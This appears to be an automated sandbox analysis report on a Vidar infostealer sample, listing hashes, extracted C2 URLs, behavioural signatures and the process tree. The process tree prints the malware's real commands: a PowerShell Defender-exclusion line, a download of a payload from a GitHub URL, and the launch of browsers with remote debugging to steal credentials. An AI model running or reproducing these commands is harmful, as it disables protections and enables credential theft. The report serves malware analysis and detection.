Analysis
-
max time kernel
140s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 18:45
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe
-
Size
356KB
-
MD5
c9602bb44dd9d4327efc6b10cd3f68e6
-
SHA1
60cf69f0e0d045d40a37013b6b9561bb28460436
-
SHA256
08d5fc7f58cb2583c0beb9ae2d153abf6fa875ae0586a27d19e233886b799846
-
SHA512
3a79a7214774b36a385550e1d2aee2bc5583e17b1375550062b3e22622c37e480ea785cff836f5cd130ff50b2c73c076e17116ec32a2f0d331803353f7a18923
-
SSDEEP
6144:irgjoi8Suh6lw+JA+ZsP3Z8sJuZWLFUoEnAs++:ii8bh6Ch+ZsPpzuZWeoEn
Malware Config
Extracted
vidar
13.3
23b8a0e48f77dc82cb41b2936121fd07
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x000e000000024049-33.dat family_vidar_v7 -
Vidar family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 27 6100 powershell.exe 29 6100 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4824 powershell.exe 6100 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 29 6100 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1292 msedge.exe 4728 msedge.exe 5616 msedge.exe 6012 chrome.exe 3288 chrome.exe 4156 chrome.exe 1428 chrome.exe 5696 chrome.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe -
Executes dropped EXE 1 IoCs
pid Process 5708 jziyhvfhp.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 28 raw.githubusercontent.com 29 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jziyhvfhp.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 jziyhvfhp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString jziyhvfhp.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879203536704438" chrome.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4824 powershell.exe 4824 powershell.exe 6100 powershell.exe 6100 powershell.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 6012 chrome.exe 6012 chrome.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe 5708 jziyhvfhp.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 1292 msedge.exe 1292 msedge.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4824 powershell.exe Token: SeDebugPrivilege 6100 powershell.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe Token: SeShutdownPrivilege 6012 chrome.exe Token: SeCreatePagefilePrivilege 6012 chrome.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 6012 chrome.exe 1292 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1060 wrote to memory of 5060 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 93 PID 1060 wrote to memory of 5060 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 93 PID 5060 wrote to memory of 4824 5060 cmd.exe 94 PID 5060 wrote to memory of 4824 5060 cmd.exe 94 PID 1060 wrote to memory of 1100 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 95 PID 1060 wrote to memory of 1100 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 95 PID 1100 wrote to memory of 6100 1100 cmd.exe 96 PID 1100 wrote to memory of 6100 1100 cmd.exe 96 PID 1060 wrote to memory of 5708 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 103 PID 1060 wrote to memory of 5708 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 103 PID 1060 wrote to memory of 5708 1060 2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe 103 PID 5708 wrote to memory of 6012 5708 jziyhvfhp.exe 111 PID 5708 wrote to memory of 6012 5708 jziyhvfhp.exe 111 PID 6012 wrote to memory of 2948 6012 chrome.exe 112 PID 6012 wrote to memory of 2948 6012 chrome.exe 112 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 2208 6012 chrome.exe 113 PID 6012 wrote to memory of 3856 6012 chrome.exe 114 PID 6012 wrote to memory of 3856 6012 chrome.exe 114 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115 PID 6012 wrote to memory of 2880 6012 chrome.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-31_c9602bb44dd9d4327efc6b10cd3f68e6_black-basta_cobalt-strike_satacom.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gwqtjrf', 'C:\Users', 'C:\ProgramData'"2⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\gwqtjrf', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/lalaltplelhsll.exe' -OutFile 'C:\Users\Admin\AppData\Local\gwqtjrf\jziyhvfhp.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/lalaltplelhsll.exe' -OutFile 'C:\Users\Admin\AppData\Local\gwqtjrf\jziyhvfhp.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
-
C:\Users\Admin\AppData\Local\gwqtjrf\jziyhvfhp.exe"C:\Users\Admin\AppData\Local\gwqtjrf\jziyhvfhp.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5708 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:6012 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97b8edcf8,0x7ff97b8edd04,0x7ff97b8edd104⤵PID:2948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2020 /prefetch:24⤵PID:2208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:34⤵PID:3856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:84⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:14⤵
- Uses browser remote debugging
PID:1428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3320 /prefetch:14⤵
- Uses browser remote debugging
PID:3288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4320 /prefetch:24⤵
- Uses browser remote debugging
PID:4156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:14⤵
- Uses browser remote debugging
PID:5696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5340,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:84⤵PID:4896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5388,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5356 /prefetch:84⤵PID:932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5364 /prefetch:84⤵PID:1300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5564,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5568 /prefetch:84⤵PID:5060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5680,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5604 /prefetch:84⤵PID:1932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5632,i,18282362166144492721,2618404707510317696,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5516 /prefetch:84⤵PID:6140
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1292 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ff97a79f208,0x7ff97a79f214,0x7ff97a79f2204⤵PID:3824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,10088738921457432859,4434922459109292575,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:34⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2260,i,10088738921457432859,4434922459109292575,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:24⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,10088738921457432859,4434922459109292575,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:84⤵PID:4992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,10088738921457432859,4434922459109292575,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:14⤵
- Uses browser remote debugging
PID:5616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,10088738921457432859,4434922459109292575,262144 --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:14⤵
- Uses browser remote debugging
PID:4728
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4448
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5864
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:5696
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD577c5cb67a0284ce4170cf5b9db22e910
SHA11d502793810abd1413128a6103dea0c05b3991ba
SHA256ae17e5b524716a6a3214555008f48873af56a0e1e24f68a7b0f1cf6deb2a605a
SHA512ac75e474baa985e1d229764b45a3c86e2173dc86bab2151c822daa0c50ac03e9bb470a343aceb089bf1925a9a5cdd51ab38ca7a8240e3e4f584698ad4ed507c8
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5dbee13a945fa6249ef7ce0d756cb5810
SHA1c5d619e29d84cd96449477a57bad2e6f2296f29d
SHA256e85ed2c2be32f8424d3abf1709948a84aaa03d8618311574c65fd9d9930316d4
SHA512c6d7ac5fce8aa2dedc096f36222fccb114707a03e6c2e5323989762f3687a492e87e262cf2d72bae14ea2e0de5bd676ac2fddc96c1c615c681e48a307c97e5c8
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
280B
MD5c37f9d2c357647fca20f2eaa89c18edd
SHA1cfd1035ed2d057c317b48546f467209cbbe15f2e
SHA2562ea3a0b7e6145fd110653b1a77cb827ad7e4a145c29378344bd3d28f595b2072
SHA5123563f4aca9e47f35de8cb38e42a3c0448bb3ec4c9183fa392abc28fee4ca08bf16da028ffbf31cf0c0f8301ed810238961e745590e5c71621bc5a2a889dd12f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\11337a04-60e2-49d6-a5ee-50aecef54732.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4b544b14-1843-4673-a1cd-26e23142833b\index-dir\the-real-index
Filesize1KB
MD5e5de56c7c36bc321c15e164f5b830a3d
SHA177af2572d467d3c412057f66c8dedd45bb4e27d5
SHA2569c9c3148b856ea7b9460acfe78b362c5b5f7ddb83fb48dfbcd39ce1864419b3f
SHA5121264e076cfbc1f127df5c87b357ec536824353389ea703f961a5750cb0ce667d8a677716eca65eef8fe52569ae295a79f058206886fdf3286ae22fe76b0c1da4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4b544b14-1843-4673-a1cd-26e23142833b\index-dir\the-real-index~RFe57a325.TMP
Filesize1KB
MD564088430453be7bd86755630c23abdd7
SHA16e87060080c0c0d2e2f2fe57477f7e9282df74af
SHA2568de39b1e9d5b03f6f5fa7508b3ff41881bef1d618674d7c2721288ac9639165c
SHA512201adf070b9b9d5e0929be66df2b85444561fa4e0e2029a45e0c61df87ced0c99af0866b468cf0ce95f07bdef0478ff91455ab620177083321db510c55868b99
-
Filesize
40KB
MD570a8eecf831dc0bd2082f6f2ace3ce3b
SHA19c9abd3a7ad7d656ff93eb3e8ca2043f189039dc
SHA2567f5310b9f5c7b9439fe755f259e5338d1ecb3b72de7f0c7156c3914e6de18628
